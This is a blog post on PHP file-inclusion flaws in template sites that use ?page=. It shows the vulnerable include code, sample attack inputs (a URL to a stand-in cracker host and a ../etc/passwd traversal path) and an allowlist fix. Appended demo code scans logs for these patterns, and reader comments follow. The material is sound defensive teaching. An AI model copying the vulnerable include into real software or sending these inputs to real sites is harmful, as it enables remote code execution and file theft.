Stop, “allinurl index.php?page=”, It Doesn’t Work!
I was scanning through my site logs and stumbled across some suspect Google searches that led to my site. Here's a breakdown:
4 for allinurl index.php?page=
1 for allinurl php?page=
1 for index.php?page=
1 for allinurl .php?page= .php
1 for allinurl .php?page=
That's 8 for just this past month of Feb. What are they searching for? Basically, these crackers are looking for an insecure PHP website that lets them run their own code on your server. If you don't know what PHP is, get on over to php.net and find out. A lot of tutorials on the web guide newbies through creating a template-based PHP design. The goal of these tutorials is that the webmaster creates one index.php file. This file contains all the graphics and creates a container around the actual content of the page. For instance, visit OpenSoft Dev. My software site uses this design. Everything is created in the index.php file and then the content page (Home Page, About Page, Products Page, etc.) is inserted in the middle. The PHP way to do this is through the code:
include 'products.php';
This code loads the named PHP file inside the other PHP file. This is a great concept: the designer creates only one page template, and whenever the template needs to change, you change it once. The problem is how most people implement the actual page chooser.
The typical way to easily insert the wanted page inside the container is below (I’m breaking it up to describe what is going on):
<?php
// Vulnerable: whatever the visitor puts in ?page= becomes the include target.
if ($_GET["page"] == "") {
$place = "home";
}
else {
$place = $_GET["page"];
}
?>
This code will typically come very near the top. $_GET is not a function but a superglobal array that holds the parameters from the URL's query string. Have you ever seen those URLs like
http://www.blah.com/query.php?q=myquery&t=1&s=11
In this URL, there are three parameters, "q," "t," and "s." In PHP each one is available as $_GET["q"], $_GET["t"] and so on; the code above copies $_GET["page"] into our variable $place. Next, we put this code where we want our inner pages to be displayed:
include $place;
Sirens ring. You've just been tricked. You will become the favorite target of many lame hackers around. If you don't see the problem, imagine this. Some cracker comes along and types into Google: allinurl index.php?page=. He then looks around smugly. He finds your URL (let's imagine it's www.blah.com). He comes to your homepage:
www.blah.com/index.php?page=home
He simply alters the url a little to be:
www.blah.com/index.php?page=http://www.some-lame-cracker-site.com/cracks/wjs22s.php
Screwed! $place will equal the URL he typed, so your server fetches that code from some random server and executes it as if it were your own. It could be anything. Whether the remote file is actually fetched depends on PHP configuration: allow_url_fopen, and since PHP 5.2 the separate allow_url_include setting (off by default), must be enabled. Even with remote includes disabled, the same line still includes whatever local file the attacker names, such as ../../../etc/passwd. So, what do we do? I actually had this happen to me last summer. Luckily the crackers didn't screw with anything, so it was ok. Here's the fix:
<?php
// Pull the requested page name; isset avoids a notice when the parameter is absent.
$page = isset($_GET["page"]) ? $_GET["page"] : "";
if (!$page) {
include "home.php";
}
// Only these exact names are accepted, and the file handed to include is always
// one of our own literal strings, never anything taken from the request.
else if($page=="home") { include "home.php"; }
else if($page=="about") { include "about.php"; }
else if($page=="products") { include "products.php"; }
else if($page=="developers") { include "developers.php"; }
else { echo "SCREW YOU HACKERS!!! or possibly the user typed the url wrong, so probably a 404 would be better"; }
?>
This is a little less clean, but it will keep your servers clean and protected. What we do here is simply limit what strings are allowed: $page is compared against a fixed allowlist, and the filename handed to include is always one of our own literal strings on the local server, never something built from the request. Note that just appending an extension (include $page . ".php") is not a fix; the attacker's URL or ../ path still reaches include, with only a suffix tacked on that he can trivially satisfy.
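The same allowlist idea written as a lookup table, shown beside the vulnerable version, as an added example that is not code from the original post. The page names and filenames are hypothetical, and the requests at the bottom are constructed to show which of them reach include() and which get a 404; it returns the decision instead of calling include() or header() so it runs from the command line without the page files.

```php
<?php
// Added example (not the original post's code). Hypothetical page table.

// Vulnerable form from the post: the include target IS the request parameter.
// With allow_url_include on (allow_url_fopen before PHP 5.2) a URL here is
// fetched and executed; with it off, any readable local file can still be named.
function vulnerable_include_target($requested)
{
    return ($requested === '') ? 'home' : $requested;   // what `include $place;` loads
}

// Hardened form: the request is only ever a KEY into a fixed table, and the
// string that reaches include() always comes from the table, never the request.
function resolve_page($requested, array $allowed)
{
    if ($requested === null || $requested === '') {
        return $allowed['home'];                          // default page
    }
    // is_string rejects ?page[]=x; isset with the exact key rejects "Home",
    // "home.php", any URL and any ../ sequence, since none are table keys.
    if (is_string($requested) && isset($allowed[$requested])) {
        return $allowed[$requested];
    }
    return null;                                          // unknown page -> 404
}

// What the front controller would do with one request: returns the decision
// instead of calling include()/header() so the demo runs without page files.
function handle(array $get, array $allowed)
{
    $file = resolve_page(isset($get['page']) ? $get['page'] : null, $allowed);
    if ($file === null) {
        return array('status' => 404, 'include' => null);   // then: 404 page
    }
    return array('status' => 200, 'include' => $file);     // then: include $file;
}

$allowed = array(
    'home'       => 'home.php',
    'about'      => 'about.php',
    'products'   => 'products.php',
    'developers' => 'developers.php',
);

// Constructed requests: two legitimate ones, the post's RFI URL, a traversal
// attempt, a near-miss name, and an array-valued parameter.
$requests = array(
    array(),
    array('page' => 'about'),
    array('page' => 'http://www.some-lame-cracker-site.com/cracks/wjs22s.php'),
    array('page' => '../../../../etc/passwd'),
    array('page' => 'products.php'),
    array('page' => array('x')),
);

foreach ($requests as $get) {
    $raw   = isset($get['page']) ? $get['page'] : '';
    $label = is_array($raw) ? 'page[]=x' : ($raw === '' ? '(no page)' : $raw);
    $old   = is_array($raw) ? '(array)' : vulnerable_include_target($raw);
    $new   = handle($get, $allowed);
    printf("%-58s old: include %-48s new: %d %s\n",
           $label, $old, $new['status'],
           $new['include'] === null ? '-' : $new['include']);
}
```

Only the second and the first request end up with a 200 and a file from the table; the URL, the traversal path, "products.php" and the array value all get a 404 without ever being used as a filename.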
I hope y'all will use PHP templating carefully and use this as a guide to help keep your servers safe.
-Dustin
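To close the loop with the log review that opened the post, here is an added example (not code from the original post) that scans access log lines for ?page= values carrying a URL or a ../ path, which is what the follow-up traffic to those Google searches looks like. The five combined-format log lines are constructed for the demo; the attacker hostname is the one from the post, the addresses are documentation ranges.

```php
<?php
// Added example, not code from the original post: flag ?page= values in web
// server access log lines that look like remote (RFI) or local (LFI) file
// inclusion attempts. Log lines are constructed for the demo (combined format).

$LOG = <<<'LOG'
203.0.113.7 - - [10/Feb/2006:13:55:36 -0500] "GET /index.php?page=home HTTP/1.1" 200 5123 "http://www.google.com/search?q=allinurl+index.php%3Fpage%3D" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2006:13:55:49 -0500] "GET /index.php?page=http://www.some-lame-cracker-site.com/cracks/wjs22s.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Feb/2006:02:12:01 -0500] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1422 "-" "libwww-perl/5.805"
198.51.100.23 - - [11/Feb/2006:02:12:05 -0500] "GET /index.php?page=%2568%2574%2574%2570://203.0.113.99/c.txt%3F HTTP/1.1" 200 901 "-" "libwww-perl/5.805"
192.0.2.44 - - [11/Feb/2006:09:30:10 -0500] "GET /index.php?page=about HTTP/1.1" 200 4011 "-" "Mozilla/4.0"
LOG;

// parse_str() already decoded the value once; decode again because attackers
// sometimes double-encode to slip past naive filters.
function classify_page_value($value)
{
    $v = urldecode($value);
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $v)) {
        return 'RFI';   // http://, https://, ftp://, data:// and other stream wrappers
    }
    if (strpos($v, '../') !== false || strpos($v, '..\\') !== false || strpos($v, "\0") !== false) {
        return 'LFI';   // directory traversal, or null-byte truncation on old PHP
    }
    return null;
}

// Returns one array per suspicious request: client ip, timestamp, kind, decoded value.
function scan_access_log($log)
{
    $hits = array();
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client ip, timestamp, then the quoted request line "METHOD target HTTP/x.y"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;
        }
        list(, $ip, $ts, , $target) = $m;
        $q = strpos($target, '?');
        if ($q === false) {
            continue;                       // no query string, nothing to check
        }
        parse_str(substr($target, $q + 1), $params);   // decodes %xx once
        if (!isset($params['page']) || !is_string($params['page'])) {
            continue;
        }
        $kind = classify_page_value($params['page']);
        if ($kind !== null) {
            $hits[] = array('ip' => $ip, 'time' => $ts, 'kind' => $kind,
                            'value' => urldecode($params['page']));
        }
    }
    return $hits;
}

foreach (scan_access_log($LOG) as $h) {
    printf("%-4s %-15s %-26s %s\n", $h['kind'], $h['ip'], $h['time'], $h['value']);
}
```

Run with php from the command line: the two plain page names pass, the post's wjs22s.php URL and the double-encoded http:// line are reported as RFI, and the /etc/passwd line as LFI. The double decoding matters: the fourth line looks like harmless %25-escaped garbage until it is decoded the second time.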
10 Replies
Craig Yingling on 8/22/2006 at 04:32I wondered if you could look at this and tell me if theres a patch or better way…
No Page has been set”;
}
?>
Thanks!!
Dustin Bachrach on 8/22/2006 at 06:40I am not fully sure what you mean by that. I don’t see where your problem is. Can you explain it a little more please?
Jenny on 2/26/2008 at 10:50I’ll admit, I found your site through a Google search for “.php?page=”, but not for the reason you believe. I’m actually trying to figure out how this is coded and how it works, as there doesn’t seem to be any explanation anywhere. Just FYI.